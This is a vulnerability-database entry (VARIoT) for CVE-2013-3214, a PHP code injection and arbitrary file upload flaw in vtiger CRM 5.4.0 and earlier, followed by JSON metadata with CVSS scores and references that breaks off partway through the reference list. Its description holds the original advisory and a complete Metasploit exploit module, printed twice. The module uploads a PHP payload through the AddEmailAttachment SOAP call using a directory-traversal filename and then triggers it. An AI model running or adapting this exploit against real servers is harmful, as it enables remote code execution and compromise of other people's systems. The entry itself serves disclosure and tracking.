var-202001-0886
Vulnerability from variot
vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in 'vtigerolservice.php'. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information.
[-] Vulnerability Description:
The vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php:
- function AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session)
- {
- if(!validateSession($username,$session))
- return null;
- global $adb;
- require_once('modules/Users/Users.php');
- require_once('include/utils/utils.php');
- $filename = preg_replace('/\s+/', '_', $filename);//replace space with _ in filename
- $date_var = date('Y-m-d H:i:s');
- $seed_user = new Users();
- $user_id = $seed_user->retrieve_user_id($username);
- $crmid = $adb->getUniqueID("vtiger_crmentity");
- $upload_file_path = decideFilePath();
- $handle = fopen($upload_file_path.$crmid."_".$filename,"wb");
- fwrite($handle,base64_decode($filedata),$filesize);
- fclose($handle);
The vulnerability exists because this method fails to properly validate input passed through the "filedata" and "filename" parameters, which are used to write an "email attachment" in the storage directory (lines 475-477).
[-] Solution:
The patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn't fix completely this vulnerability, because a remote authenticated user can still be able to inject and execute arbitrary code.
[*] The vendor was alerted about this when the feedback has been provided.
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified [06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848 [05/03/2013] - Feedback provided to the vendor [*] [26/03/2013] - Vendor patch released [18/04/2013] - CVE number requested [20/04/2013] - CVE number assigned [01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3214 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-07
. ##
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core' require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper
def initialize(info = {}) super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2. }, 'Author' => [ 'Egidio Romano', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3214' ], [ 'CVE', '2013-3215' ], [ 'OSVDB', '95902' ], [ 'OSVDB', '95903' ], [ 'BID', '61558' ], [ 'BID', '61559' ], [ 'EDB', '27279' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ], [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { # Arbitrary big number. The payload is sent base64 encoded # into a POST SOAP request 'Space' => 262144, # 256k 'DisableNops' => true }, 'Targets' => [ [ 'vTigerCRM v5.4.0', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
], self.class)
end
def check test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4))) res = send_soap_request(test_one)
unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
return Exploit::CheckCode::Unknown
end
test_two = check_email_soap("admin")
res = send_soap_request(test_two)
if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit file_name = rand_text_alpha(rand(10)+6) + '.php' php = %Q||
soap = add_attachment_soap(file_name, php)
res = send_soap_request(soap)
print_status("#{peer} - Uploading payload...")
if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
print_good("#{peer} - Upload successfully uploaded")
register_files_for_cleanup(file_name)
else
fail_with(Failure::Unknown, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
end
def add_attachment_soap(file_name, file_data) xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:AddEmailAttachment", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("emailid", {'xsi:type' => 'xsd:string'}) crm.add_element("filedata", {'xsi:type' => 'xsd:string'}) crm.add_element("filename", {'xsi:type' => 'xsd:string'}) crm.add_element("filesize", {'xsi:type' => 'xsd:string'}) crm.add_element("filetype", {'xsi:type' => 'xsd:string'}) crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['emailid'].text = rand_text_alpha(4+rand(4)) crm.elements['filedata'].text = "MSF_PAYLOAD" crm.elements['filename'].text = "MSF_FILENAME" crm.elements['filesize'].text = file_data.length.to_s crm.elements['filetype'].text = "php" crm.elements['username'].text = rand_text_alpha(4+rand(4))
xml_string = xml.to_s
xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
return xml_string
end
def check_email_soap(user_name = "", session = "") xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:crm' => "http://www.vtiger.com/products/crm" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( "crm:CheckEmailPermission", { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) crm = body.elements[1] crm.add_element("username", {'xsi:type' => 'xsd:string'}) crm.add_element("session", {'xsi:type' => 'xsd:string'}) crm.elements['username'].text = user_name crm.elements['session'].text = session
xml.to_s
end
def send_soap_request(soap_data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_data })
return res
end
end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0886",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "crm",
"scope": "lte",
"trust": 1.8,
"vendor": "vtiger",
"version": "5.4.0"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.8,
"vendor": "vtiger",
"version": null
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.3"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.2.1"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.2"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.1"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.4"
},
{
"model": "crm",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.3"
},
{
"model": "crm rc",
"scope": "eq",
"trust": 0.3,
"vendor": "vtiger",
"version": "5.0.4"
}
],
"sources": [
{
"db": "BID",
"id": "61558"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Egidio Romano",
"sources": [
{
"db": "BID",
"id": "61558"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
}
],
"trust": 0.9
},
"cve": "CVE-2013-3214",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2013-3214",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-63216",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-3214",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-3214",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-3214",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-3214",
"trust": 0.8,
"value": "Critical"
},
{
"author": "VULHUB",
"id": "VHN-63216",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-3214",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerability in \u0027vtigerolservice.php\u0027. vtiger CRM Contains an injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. \nAn attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. \nvtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM developed by American Vtiger Company. The management system provides functions such as management, collection, and analysis of customer information. \n\n\n[-] Vulnerability Description:\n\nThe vulnerable code is located in the AddEmailAttachment SOAP method defined in /soap/vtigerolservice.php:\n\n458. \tfunction AddEmailAttachment($emailid,$filedata,$filename,$filesize,$filetype,$username,$session)\n459. \t{\n460. \t\tif(!validateSession($username,$session))\n461. \t\treturn null;\n462. \t\tglobal $adb;\n463. \t\trequire_once(\u0027modules/Users/Users.php\u0027);\n464. \t\trequire_once(\u0027include/utils/utils.php\u0027);\n465. \t\t$filename = preg_replace(\u0027/\\s+/\u0027, \u0027_\u0027, $filename);//replace space with _ in filename\n466. \t\t$date_var = date(\u0027Y-m-d H:i:s\u0027);\n467. \t\n468. \t\t$seed_user = new Users();\n469. \t\t$user_id = $seed_user-\u003eretrieve_user_id($username);\n470. \t\n471. \t\t$crmid = $adb-\u003egetUniqueID(\"vtiger_crmentity\");\n472. \t\n473. \t\t$upload_file_path = decideFilePath();\n474. \t\n475. \t\t$handle = fopen($upload_file_path.$crmid.\"_\".$filename,\"wb\");\n476. \t\tfwrite($handle,base64_decode($filedata),$filesize);\n477. \t\tfclose($handle);\n\nThe vulnerability exists because this method fails to properly validate input passed through the \"filedata\" and\n\"filename\" parameters, which are used to write an \"email attachment\" in the storage directory (lines 475-477). \n\n\n[-] Solution:\n\nThe patch provided by the vendor (http://www.vtiger.com/blogs/?p=1467) doesn\u0027t fix completely this\nvulnerability, because a remote authenticated user can still be able to inject and execute arbitrary code. \n\n[*] The vendor was alerted about this when the feedback has been provided. \n\n\n[-] Disclosure Timeline:\n\n[13/01/2013] - Vendor notified\n[06/02/2013] - Vendor asked feedback abouthttp://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848\n[05/03/2013] - Feedback provided to the vendor [*]\n[26/03/2013] - Vendor patch released\n[18/04/2013] - CVE number requested\n[20/04/2013] - CVE number assigned\n[01/08/2013] - Public disclosure\n\n\n[-] CVE Reference:\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2013-3214 to this vulnerability. \n\n\n[-] Credits:\n\nVulnerability discovered by Egidio Romano. \n\n\n[-] Original Advisory:\n\nhttp://karmainsecurity.com/KIS-2013-07\n\n. ##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\nrequire \u0027rexml/document\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include REXML\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n \u0027Name\u0027 =\u003e \u0027vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload\u0027,\n \u0027Description\u0027 =\u003e %q{\n vTiger CRM allows an user to bypass authentication when requesting SOAP services. \n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027Egidio Romano\u0027, # Vulnerability discovery\n \u0027juan vazquez\u0027 # msf module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [ \u0027CVE\u0027, \u00272013-3214\u0027 ],\n [ \u0027CVE\u0027, \u00272013-3215\u0027 ],\n [ \u0027OSVDB\u0027, \u002795902\u0027 ],\n [ \u0027OSVDB\u0027, \u002795903\u0027 ],\n [ \u0027BID\u0027, \u002761558\u0027 ],\n [ \u0027BID\u0027, \u002761559\u0027 ],\n [ \u0027EDB\u0027, \u002727279\u0027 ],\n [ \u0027URL\u0027, \u0027http://karmainsecurity.com/KIS-2013-07\u0027 ],\n [ \u0027URL\u0027, \u0027http://karmainsecurity.com/KIS-2013-08\u0027 ]\n ],\n \u0027Privileged\u0027 =\u003e false,\n \u0027Platform\u0027 =\u003e [\u0027php\u0027],\n \u0027Arch\u0027 =\u003e ARCH_PHP,\n \u0027Payload\u0027 =\u003e\n {\n # Arbitrary big number. The payload is sent base64 encoded\n # into a POST SOAP request\n \u0027Space\u0027 =\u003e 262144, # 256k\n \u0027DisableNops\u0027 =\u003e true\n },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027vTigerCRM v5.4.0\u0027, { } ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Mar 26 2013\u0027))\n\n register_options(\n [\n OptString.new(\u0027TARGETURI\u0027, [ true, \"Base vTiger CRM directory path\", \u0027/vtigercrm/\u0027])\n ], self.class)\n end\n\n def check\n test_one = check_email_soap(\"admin\", rand_text_alpha(4 + rand(4)))\n res = send_soap_request(test_one)\n\n unless res and res.code == 200 and res.body.to_s =~ /\u003creturn xsi:nil=\"true\" xsi:type=\"xsd:string\"\\/\u003e/\n return Exploit::CheckCode::Unknown\n end\n\n test_two = check_email_soap(\"admin\")\n res = send_soap_request(test_two)\n\n if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /\u003creturn xsi:type=\"xsd:string\"\u003e.*\u003c\\/return\u003e/)\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n file_name = rand_text_alpha(rand(10)+6) + \u0027.php\u0027\n php = %Q|\u003c?php #{payload.encoded} ?\u003e|\n\n soap = add_attachment_soap(file_name, php)\n res = send_soap_request(soap)\n\n print_status(\"#{peer} - Uploading payload...\")\n if res and res.code == 200 and res.body.to_s =~ /\u003creturn xsi:type=\"xsd:string\"\u003e.*\u003c\\/return\u003e/\n print_good(\"#{peer} - Upload successfully uploaded\")\n register_files_for_cleanup(file_name)\n else\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n print_status(\"#{peer} - Executing payload...\")\n send_request_cgi({\u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027soap\u0027, file_name)}, 0)\n end\n\n def add_attachment_soap(file_name, file_data)\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n \u0027xmlns:xsi\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema-instance\",\n \u0027xmlns:xsd\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema\",\n \u0027xmlns:soapenv\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/envelope/\",\n \u0027xmlns:crm\u0027 =\u003e \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:AddEmailAttachment\",\n {\n \u0027soapenv:encodingStyle\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"emailid\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filedata\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filename\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filesize\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"filetype\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"username\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"session\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.elements[\u0027emailid\u0027].text = rand_text_alpha(4+rand(4))\n crm.elements[\u0027filedata\u0027].text = \"MSF_PAYLOAD\"\n crm.elements[\u0027filename\u0027].text = \"MSF_FILENAME\"\n crm.elements[\u0027filesize\u0027].text = file_data.length.to_s\n crm.elements[\u0027filetype\u0027].text = \"php\"\n crm.elements[\u0027username\u0027].text = rand_text_alpha(4+rand(4))\n\n xml_string = xml.to_s\n xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))\n xml_string.gsub!(/MSF_FILENAME/, \"../../../../../../#{file_name}\")\n\n return xml_string\n end\n\n def check_email_soap(user_name = \"\", session = \"\")\n xml = Document.new\n xml.add_element(\n \"soapenv:Envelope\",\n {\n \u0027xmlns:xsi\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema-instance\",\n \u0027xmlns:xsd\u0027 =\u003e \"http://www.w3.org/2001/XMLSchema\",\n \u0027xmlns:soapenv\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/envelope/\",\n \u0027xmlns:crm\u0027 =\u003e \"http://www.vtiger.com/products/crm\"\n })\n xml.root.add_element(\"soapenv:Header\")\n xml.root.add_element(\"soapenv:Body\")\n body = xml.root.elements[2]\n body.add_element(\n \"crm:CheckEmailPermission\",\n {\n \u0027soapenv:encodingStyle\u0027 =\u003e \"http://schemas.xmlsoap.org/soap/encoding/\"\n })\n crm = body.elements[1]\n crm.add_element(\"username\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.add_element(\"session\", {\u0027xsi:type\u0027 =\u003e \u0027xsd:string\u0027})\n crm.elements[\u0027username\u0027].text = user_name\n crm.elements[\u0027session\u0027].text = session\n\n xml.to_s\n end\n\n def send_soap_request(soap_data)\n res = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027soap\u0027, \u0027vtigerolservice.php\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027ctype\u0027 =\u003e \u0027text/xml; charset=UTF-8\u0027,\n \u0027data\u0027 =\u003e soap_data\n })\n\n return res\n end\n\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3214"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "BID",
"id": "61558"
},
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "PACKETSTORM",
"id": "122646"
},
{
"db": "PACKETSTORM",
"id": "124698"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30787",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-63216",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-3214",
"trust": 3.1
},
{
"db": "BID",
"id": "61558",
"trust": 2.1
},
{
"db": "EXPLOIT-DB",
"id": "30787",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "124698",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "122646",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "27279",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-84151",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-63216",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-3214",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "BID",
"id": "61558"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "PACKETSTORM",
"id": "122646"
},
{
"db": "PACKETSTORM",
"id": "124698"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"id": "VAR-202001-0886",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
}
],
"trust": 0.62916664
},
"last_update_date": "2024-08-14T13:25:07.584000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.vtiger.com/"
},
{
"title": "Vtiger CRM vtigerolservice.php Remotely PHP Fixes for code injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109036"
},
{
"title": "CVE-2013-3214",
"trust": 0.1,
"url": "https://github.com/shadofren/CVE-2013-3214 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/khulnasoft-labs/awesome-security "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-3214"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-009"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-74",
"trust": 1.1
},
{
"problemtype": "injection (CWE-74) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-63216"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007120"
},
{
"db": "NVD",
"id": "CVE-2013-3214"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86164"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/61558"
},
{
"trust": 1.8,
"url": "http://www.exploit-db.com/exploits/30787"
},
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-3214"
},
{
"trust": 0.4,
"url": "http://www.vtiger.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/74.html"
},
{
"trust": 0.1,
"url": "https://github.com/shadofren/cve-2013-3214"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/30787/"
},
{
"trust": 0.1,
"url": "http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848"
},
{
"trust": 0.1,
"url": "http://karmainsecurity.com/kis-2013-07"
},
{
"trust": 0.1,
"url": "http://www.vtiger.com/blogs/?p=1467)"
},
{
"trust": 0.1,
